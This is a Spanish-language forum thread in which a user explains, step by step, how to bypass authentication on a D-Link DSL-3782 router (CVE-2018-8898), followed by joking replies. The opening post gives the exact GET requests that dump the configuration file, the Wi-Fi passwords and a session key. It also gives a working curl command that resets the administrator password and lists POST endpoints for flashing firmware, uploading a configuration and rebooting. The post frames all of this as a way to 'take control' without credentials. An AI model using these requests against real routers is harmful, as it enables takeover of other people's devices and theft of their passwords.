Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

kcdtv · 21-05-2018 13:00:52

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

fuente

D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms

El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg

Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

Red b/g/n;

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp

Red ac:

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp

Red invitados

GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

Cambiar los credenciales de administrador de acceso a la interfaz web

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

Cambiar las contraseñas wifi

POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp

Actualizar firmware

POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp

Forzar reboot

POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp

Subir una nueva configuración

POST /cgi-bin/New_GUI/Set/config_upgrade.asp

El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link! roll

crash · 21-05-2018 13:13:08

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

kcdtv · 21-05-2018 13:18:42

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA. big_smile

josep345 · 21-05-2018 13:20:56

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.

Tema	Respuestas	Vistas	Ultimo mensaje
Pegado: Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher [ 1 2 3 … 17 ]	414	129903	Ayer 11:02:23 por Patcher
Pegado: Pegado:: Base de datos WPSPIN (original) open source actualizada por kcdtv [ 1 2 3 4 5 ]	110	102249	21-03-2019 10:10:48 por Patcher
Configurar antena Ubiquiti loco M5 a proveedor megacable. por Pakalkin	2	123	21-03-2019 01:31:16 por javierbu
Vulnerabilidad WPA con Sagecom [email protected] 5260 por jorose1987	2	284	19-03-2019 20:46:39 por yojanon
A los que habeis probado la AWUS1900 por powermi	1	108	17-03-2019 12:15:44 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 21-05-2018 13:00:52